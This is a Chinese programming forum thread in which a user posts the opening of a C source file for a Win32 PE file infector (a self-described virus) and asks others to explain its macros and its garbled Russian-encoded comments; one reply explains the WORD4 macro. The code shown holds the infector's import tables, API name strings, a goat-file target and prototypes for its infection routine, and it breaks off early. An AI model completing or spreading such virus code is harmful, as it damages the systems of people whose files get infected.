主要是那些乱码 还有开头的那些宏定义真的不懂 这是一个小小的病毒的程序

//win32cpp - PE infector
//authors  - meza & SMT
 
#include <windows.h>


#define WORD4(a,b,c,d) ((a)+(b)*0x100+(c)*0x10000+(d)*0x1000000)
//#pragma pack (4) // 礤 珥帼, 镳a忤朦眍 腓 磬镨襦?.. 玟羼?祉?眢骓?
                 // 黩钺?溧眄? ?耱痼牝箴圊 恹疣忭桠嚯桉?磬 4-徉轵眢?沭囗桷?

struct GLOBAL { // 觐眈蜞眚?
    struct { // import directory
        unsigned lookup;
        unsigned linktime, chain;
        unsigned libname;
        unsigned addrtable;
        unsigned nextitem[5];
    } importdir;
    struct { // lookup table
        unsigned func1;
        unsigned func2;
        unsigned funcN;
    } lookup;
    struct { // imported functions
        FARPROC (__stdcall *_GetProcAddress_)(HMODULE, const char *);
        HINSTANCE (__stdcall *_LoadLibrary_)(const char *);
    } imported;
    char libname[16];
    char user[16];
    char getProcAddress[20];
    char loadLibrary[16];
    unsigned entryRVA;
    unsigned prev_import;
    unsigned startRVA;
    unsigned importRVA;
    char createFileA[12];
    char closeHandle[12];
    char readFile[12];
    char writeFile[12];
    char setFilePointer[16];
    char getFileSize[12];
    char exitProcess[12];
    char messageBoxA[12];
    char getModuleHandle[20];
    char goat[16];
    char exception[20];
    char infstart[20];
    char infend[20];
    unsigned importdone;
    unsigned isdll;
} globals = {
    { 0, 0, 0, 0, 0, {0, 0, 0, 0, 0}},
    { 0, 0, 0},
    NULL, NULL,
    "KERNEL32.DLL",
    "USER32.DLL",
    "\0\0GetProcAddress",
    "\0\0LoadLibraryA",
    0, 0, 0, 0,
    "CreateFileA",
    "CloseHandle",
    "ReadFile",
    "WriteFile",
    "SetFilePointer",
    "GetFileSize",
    "ExitProcess",
    "MessageBoxA",
    "GetModuleHandleA",
    "GOAT.EXE",
    "exception occured",
    "infection started",
    "infection ended",
    0,
    0
};

typedef struct { // "汶钺嚯??" 镥疱戾眄?
    HANDLE (__stdcall *_CreateFile)(LPCTSTR,DWORD,DWORD,LPSECURITY_ATTRIBUTES,DWORD,DWORD,HANDLE);
    BOOL (__stdcall *_CloseHandle)(HANDLE);
    BOOL (__stdcall *_ReadFile)(HANDLE,LPVOID,DWORD,LPDWORD,LPOVERLAPPED);
    BOOL (__stdcall *_WriteFile)(HANDLE,const void *,DWORD,LPDWORD,LPOVERLAPPED);
    DWORD (__stdcall *_SetFilePointer)(HANDLE,LONG,PLONG,DWORD);
    DWORD (__stdcall *_GetFileSize)(HANDLE,LPDWORD);
    FARPROC (__stdcall *_GetProcAddress)(HMODULE, const char *);
    HINSTANCE (__stdcall *_LoadLibrary)(const char*);
    void (__stdcall *_ExitProcess)(UINT);
    int (__stdcall *_MessageBox)(HWND,LPCTSTR,LPCTSTR,UINT);
    HMODULE (__stdcall *_GetModuleHandle)(LPCTSTR);
    struct GLOBAL *globals;
} FUNC;
typedef FUNC *PFUNC;

typedef unsigned (__stdcall *SEHFUNC)(PFUNC);
typedef void (__stdcall *ERRFUNC)(PFUNC);
// 镳铗铗栾?--------------------------
void *delta(void *start);
void lastfunc();
void strcpy(char *, char *);
void strcat(char *, char *);
int infect(PFUNC func, char *name);
unsigned seh(SEHFUNC, ERRFUNC, PFUNC);
unsigned __stdcall search(PFUNC);
void __stdcall infecterror(PFUNC);
// ------------------------------------

#define RVA(x) (unsigned*)((unsigned)base+(unsigned)(x))

#define ALIGN(a,b) (((a-1) | (b-1))+1)

BOOL __stdcall firstfunc(HANDLE p1, DWORD p2, LPVOID p3) { // DllMain, 黩钺?玎疣驵螯 DLL

    FUNC func;
    struct GLOBAL *globals;
    unsigned name;
    unsigned base;

    FARPROC (__stdcall *_GetProcAddress)(HMODULE, const char *);
    HINSTANCE (__stdcall *_LoadLibrary)(const char *);

    globals = func.globals = (struct GLOBAL*)delta((void*)lastfunc);

//桤戾?蝰

没空…………

谢谢  没事儿

。。。。。太长了。。。

struct GLOBAL { // 觐眈蜞眚?
    struct { // import directory
        unsigned lookup;
        unsigned linktime, chain;
        unsigned libname;
        unsigned addrtable;
        unsigned nextitem[5];
    } importdir;
    struct { // lookup table
        unsigned func1;
        unsigned func2;
        unsigned funcN;
    } lookup;
    struct { // imported functions
        FARPROC (__stdcall *_GetProcAddress_)(HMODULE, const char *);
        HINSTANCE (__stdcall *_LoadLibrary_)(const char *);
    } imported;
    char libname[16];
    char user[16];
    char getProcAddress[20];
    char loadLibrary[16];
    unsigned entryRVA;
    unsigned prev_import;
    unsigned startRVA;
    unsigned importRVA;
    char createFileA[12];
    char closeHandle[12];
    char readFile[12];
    char writeFile[12];
    char setFilePointer[16];
    char getFileSize[12];
    char exitProcess[12];
    char messageBoxA[12];
    char getModuleHandle[20];
    char goat[16];
    char exception[20];
    char infstart[20];
    char infend[20];
    unsigned importdone;
    unsigned isdll;
} globals = {
    { 0, 0, 0, 0, 0, {0, 0, 0, 0, 0}},
    { 0, 0, 0},
    NULL, NULL,
    "KERNEL32.DLL",
    "USER32.DLL",
    "\0\0GetProcAddress",
    "\0\0LoadLibraryA",
    0, 0, 0, 0,
    "CreateFileA",
    "CloseHandle",
    "ReadFile",
    "WriteFile",
    "SetFilePointer",
    "GetFileSize",
    "ExitProcess",
    "MessageBoxA",
    "GetModuleHandleA",
    "GOAT.EXE",
    "exception occured",
    "infection started",
    "infection ended",
    0,
    0
};

这个是结构体GLOBAL的定义和初始化，为什么那么复杂那，其实是因为GLOBAL这个结构体里面有嵌套了几个结构体

其实不是啦  我是不知道那些宏定义的前缀 呵呵  大家努力啊 帮帮小弟

#define WORD4(a,b,c,d) ((a)+(b)*0x100+(c)*0x10000+(d)*0x1000000)
这个宏定义其实很简单，前面是 a,b,c,d四个参数，后面就是四个参数的运算规则，比如WORD4(1,2,3,4) 机相当于((1)+(2)*0x100+(3)*0x10000+(4)*0x1000000)，就是用1234替换abcd

别的呢 那么多 看不来的 如果可以的话最好能把他的那些乱码翻译过来 有劳大家了

其实这是一个病毒程序 网上的大侠写的真的不错 内嵌汇编那段不用主要是c语言的程序 大家 帮忙啊